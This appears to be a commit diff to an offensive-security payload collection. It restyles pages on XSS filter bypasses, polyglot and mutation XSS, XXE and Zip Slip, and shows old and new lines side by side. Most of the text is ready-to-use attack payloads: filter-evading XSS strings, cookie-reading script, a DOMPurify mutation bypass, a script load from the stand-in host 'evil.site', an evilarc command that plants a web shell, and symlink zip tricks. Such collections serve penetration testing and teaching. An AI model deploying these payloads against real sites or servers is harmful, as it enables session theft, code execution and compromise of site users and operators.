Set.constructor`al\x65rt\x2814\x29```; Set.constructor`al\x65rt\x2814\x29```;
``` ```
## Bypass with incomplete html tag ## Bypass with Incomplete HTML Tag
Works on IE/Firefox/Chrome/Safari Works on IE/Firefox/Chrome/Safari
@ -79,13 +80,13 @@ Works on IE/Firefox/Chrome/Safari
<img src='1' onerror='alert(0)' < <img src='1' onerror='alert(0)' <
``` ```
## Bypass quotes for string ## Bypass Quotes for String
```javascript ```javascript
String.fromCharCode(88,83,83) String.fromCharCode(88,83,83)
``` ```
## Bypass quotes in script tag ## Bypass Quotes in Script Tag
```javascript ```javascript
http://localhost/bla.php?test=</script><script>alert(1)</script> http://localhost/bla.php?test=</script><script>alert(1)</script>
@ -96,7 +97,7 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
</html> </html>
``` ```
## Bypass quotes in mousedown event ## Bypass Quotes in Mousedown Event
You can bypass a single quote with &#39; in an on mousedown event handler You can bypass a single quote with &#39; in an on mousedown event handler
@ -104,7 +105,7 @@ You can bypass a single quote with &#39; in an on mousedown event handler
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
``` ```
## Bypass dot filter ## Bypass Dot Filter
```javascript ```javascript
<script>window['alert'](document['domain'])</script> <script>window['alert'](document['domain'])</script>
@ -119,60 +120,74 @@ http://www.geektools.com/cgi-bin/ipconv.cgi
Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
## Bypass parenthesis for string ## Bypass Parenthesis for String
```javascript ```javascript
alert`1` alert`1`
setTimeout`alert\u0028document.domain\u0029`; setTimeout`alert\u0028document.domain\u0029`;
``` ```
## Bypass parenthesis and semi colon ## Bypass Parenthesis and Semi Colon
```javascript * From @garethheyes
// From @garethheyes ```javascript
<script>onerror=alert;throw 1337</script> <script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script> <script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script> <script>throw onerror=alert,'some string',123,'haha'</script>
```
// From @terjanq * From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> ```js
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
```
// From @cgvwzq * From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> ```js
``` <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
## Bypass onxxxx= blacklist ## Bypass onxxxx Blacklist
```javascript * Use less known tag
<object onafterscriptexecute=confirm(0)> ```html
<object onbeforescriptexecute=confirm(0)> <object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
```
// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed * Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
<img src='1' onerror\x00=alert(0) /> ```html
<img src='1' onerror\x0b=alert(0) /> <img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0d=alert(0) /> <img src='1' onerror\x0b=alert(0) />
<img src='1' onerror\x0a=alert(0) /> <img src='1' onerror\x0d=alert(0) />
<img src='1' onerror\x0a=alert(0) />
```
// Bypass onxxx= filter with a '/' * Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) /> ```js
``` <img src='1' onerror/=alert(0) />
```
## Bypass space filter
```javascript ## Bypass Space Filter
// Bypass space filter with "/"
<img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I * Bypass space filter with "/"
<svg onload = alert(1) > ```javascript
<img/src='1'/onerror=alert(0)>
```
* Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I`
```html
<svg onload = alert(1) >
```
```ps1
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a ert(1).>. 00000010: 6572 7428 3129 0c3e 0a ert(1).>.
``` ```
## Bypass email filter ## Bypass Email Filter
* [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
```javascript ```javascript
@ -185,7 +200,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
``` ```
## Bypass tel URI filter ## Bypass Tel URI Filter
At least 2 RFC mention the `;phone-context=` descriptor: At least 2 RFC mention the `;phone-context=` descriptor:
@ -197,22 +212,22 @@ At least 2 RFC mention the `;phone-context=` descriptor:
``` ```
## Bypass document blacklist ## Bypass Document Blacklist
```javascript ```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
window["doc"+"ument"] window["doc"+"ument"]
``` ```
## Bypass document.cookie blacklist ## Bypass document.cookie Blacklist
This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
``` ```js
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
``` ```
## Bypass using javascript inside a string ## Bypass using Javascript Inside a String
```javascript ```javascript
<script> <script>
@ -220,7 +235,7 @@ foo="text </script><script>alert(1)</script>";
</script> </script>
``` ```
## Bypass using an alternate way to redirect ## Bypass using an Alternate Way to Redirect
```javascript ```javascript
location="http://google.com" location="http://google.com"
@ -230,7 +245,7 @@ window.location.assign("http://google.com")
window['location']['href']="http://google.com" window['location']['href']="http://google.com"
``` ```
## Bypass using an alternate way to execute an alert ## Bypass using an Alternate Way to Execute an Alert
From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.
@ -271,14 +286,15 @@ self[Object.keys(self)[5]]("1") // alert("1")
We can find "alert" with a regular expression like ^a[rel]+t$ : We can find "alert" with a regular expression like ^a[rel]+t$ :
```javascript ```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() //bind function alert on new function a()
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}}
// then you can use a() with Object.keys // then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1") self[Object.keys(self)[a()]]("1") // alert("1")
``` ```
Oneliner: Oneliner:
```javascript ```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
``` ```
@ -339,9 +355,9 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
XSSObject.proxy(window, 'alert', 'window.alert', false); XSSObject.proxy(window, 'alert', 'window.alert', false);
``` ```
## Bypass ">" using nothing ## Bypass ">" using Nothing
You don't need to close your tags. There is no need to close the tags, the browser will try to fix it.
```javascript ```javascript
<svg onload=alert(1)// <svg onload=alert(1)//
@ -355,7 +371,7 @@ Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#b
script/src=//evil.site/poc.js script/src=//evil.site/poc.js
``` ```
## Bypass ";" using another character ## Bypass ";" using Another Character
```javascript ```javascript
'te' * alert('*') * 'xt'; 'te' * alert('*') * 'xt';
@ -376,7 +392,7 @@ Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#b
``` ```
## Bypass using missing charset header ## Bypass using Missing Charset Header
**Requirements**: **Requirements**:
@ -409,7 +425,7 @@ Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unesc
Payload: `search=%1b(J&lang=en";alert(1)//` Payload: `search=%1b(J&lang=en";alert(1)//`
## Bypass using HTML encoding ## Bypass using HTML Encoding
```javascript ```javascript
%26%2397;lert(1) %26%2397;lert(1)
@ -556,7 +572,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
``` ```
## Bypass using jsfuck ## Bypass using JSfuck
Bypass using [jsfuck](http://www.jsfuck.com/) Bypass using [jsfuck](http://www.jsfuck.com/)

View File

@ -1,5 +1,7 @@
# Polyglot XSS # Polyglot XSS
A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work across multiple contexts within a web application, such as HTML, JavaScript, and attributes. It exploits the applications inability to properly sanitize input in different parsing scenarios.
* Polyglot XSS - 0xsobky * Polyglot XSS - 0xsobky
```javascript ```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

View File

@ -12,24 +12,23 @@
- [UI Redressing](#ui-redressing) - [UI Redressing](#ui-redressing)
- [Javascript Keylogger](#javascript-keylogger) - [Javascript Keylogger](#javascript-keylogger)
- [Other Ways](#other-ways) - [Other Ways](#other-ways)
- [Identify an XSS endpoint](#identify-an-xss-endpoint) - [Identify an XSS Endpoint](#identify-an-xss-endpoint)
- [Tools](#tools) - [Tools](#tools)
- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in HTML/Applications](#xss-in-htmlapplications)
- [Common Payloads](#common-payloads) - [Common Payloads](#common-payloads)
- [XSS using HTML5 tags](#xss-using-html5-tags) - [XSS using HTML5 tags](#xss-using-html5-tags)
- [XSS using a remote JS](#xss-using-a-remote-js) - [XSS using a Remote JS](#xss-using-a-remote-js)
- [XSS in hidden input](#xss-in-hidden-input) - [XSS in Hidden Input](#xss-in-hidden-input)
- [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized) - [XSS in Uppercase Output](#xss-in-uppercase-output)
- [DOM based XSS](#dom-based-xss) - [DOM Based XSS](#dom-based-xss)
- [XSS in JS Context](#xss-in-js-context) - [XSS in JS Context](#xss-in-js-context)
- [XSS in Wrappers for URI](#xss-in-wrappers-for-uri) - [XSS in Wrappers for URI](#xss-in-wrappers-for-uri)
- [Wrapper javascript:](#wrapper-javascript) - [Wrapper javascript:](#wrapper-javascript)
- [Wrapper data:](#wrapper-data) - [Wrapper data:](#wrapper-data)
- [Wrapper vbscript:](#wrapper-vbscript) - [Wrapper vbscript:](#wrapper-vbscript)
- [XSS in files](#xss-in-files) - [XSS in Files](#xss-in-files)
- [XSS in XML](#xss-in-xml) - [XSS in XML](#xss-in-xml)
- [XSS in SVG](#xss-in-svg) - [XSS in SVG](#xss-in-svg)
- [XSS in SVG (short)](#xss-in-svg-short)
- [XSS in Markdown](#xss-in-markdown) - [XSS in Markdown](#xss-in-markdown)
- [XSS in CSS](#xss-in-css) - [XSS in CSS](#xss-in-css)
- [XSS in PostMessage](#xss-in-postmessage) - [XSS in PostMessage](#xss-in-postmessage)
@ -128,7 +127,7 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
## Identify an XSS endpoint ## Identify an XSS Endpoint
This payload opens the debugger in the developer console rather than triggering a popup alert box. This payload opens the debugger in the developer console rather than triggering a popup alert box.
@ -251,7 +250,7 @@ Most tools are also suitable for blind XSS attacks:
e.g: 14.rs/#alert(document.domain) e.g: 14.rs/#alert(document.domain)
``` ```
### XSS in hidden input ### XSS in Hidden Input
```javascript ```javascript
<input type="hidden" accesskey="X" onclick="alert(1)"> <input type="hidden" accesskey="X" onclick="alert(1)">
@ -262,13 +261,13 @@ in newer browsers : firefox-130/chrome-108
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto" > <input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto" >
``` ```
### XSS when payload is reflected capitalized ### XSS in Uppercase Output
```javascript ```javascript
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)> <IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
``` ```
### DOM based XSS ### DOM Based XSS
Based on a DOM XSS sink. Based on a DOM XSS sink.
@ -329,7 +328,7 @@ only IE
vbscript:msgbox("XSS") vbscript:msgbox("XSS")
``` ```
## XSS in files ## XSS in Files
**NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. **NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
@ -389,7 +388,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc
### XSS in SVG (short) #### Short SVG Payload
```javascript ```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -399,7 +398,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
``` ```
### XSS in SVG (nesting) ### Nesting SVG and XSS
Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj. Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.
@ -500,6 +499,7 @@ document.getElementById('btn').onclick = function(e){
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
You can set up an alternative version You can set up an alternative version
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express) * Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/) * Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
@ -511,9 +511,9 @@ You can set up an alternative version
### Other Blind XSS tools ### Other Blind XSS tools
- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) - [Netflix-Skunkworks/sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) - [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
- [ezXSS - ssl](https://github.com/ssl/ezXSS) - [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
### Blind XSS endpoint ### Blind XSS endpoint
@ -540,20 +540,25 @@ Eg. payload
Eg. one-line HTTP server: Eg. one-line HTTP server:
``` ```ps1
$ ruby -run -ehttpd . -p8080 $ ruby -run -ehttpd . -p8080
``` ```
## Mutated XSS ## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. Use browsers quirks to recreate some HTML tags.
Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. **Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search.
```javascript ```javascript
<noscript><p title="</noscript><img src=x onerror=alert(1)>"> <noscript><p title="</noscript><img src=x onerror=alert(1)>">
``` ```
Technical blogposts available at
* https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/
* https://research.securitum.com/dompurify-bypass-using-mxss/
## Labs ## Labs

View File

@ -631,7 +631,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv): Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
``` ```ps1
$ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
``` ```

View File

@ -6,39 +6,45 @@
* [Tools](#tools) * [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
* [Detection](#detection) * [Additional Notes](#additional-notes)
* [Basic Exploit](#basic-exploit) * [References](#references)
* [Additional Notes](#additional-notes)
## Tools ## Tools
* [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities * [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
* [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives * [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
## Methodology ## Methodology
### Detection The Zip Slip vulnerability is a critical security flaw that affects the handling of archive files, such as ZIP, TAR, or other compressed file formats. This vulnerability allows an attacker to write arbitrary files outside of the intended extraction directory, potentially overwriting critical system files, executing malicious code, or gaining unauthorized access to sensitive information.
Any ZIP upload page on the application. **Example**: Suppose an attacker creates a ZIP file with the following structure:
### Basic Exploit ```
malicious.zip
Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc): ├── ../../../../etc/passwd
├── ../../../../usr/local/bin/malicious_script.sh
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
``` ```
Creating a ZIP archive containing a symbolic link: When a vulnerable application extracts `malicious.zip`, the files are written to `/etc/passwd` and /`usr/local/bin/malicious_script.sh` instead of being contained within the extraction directory. This can have severe consequences, such as corrupting system files or executing malicious scripts.
```ps1
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
### Additional Notes * Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
```python
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
* Creating a ZIP archive containing a symbolic link:
```ps1
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
## References ## References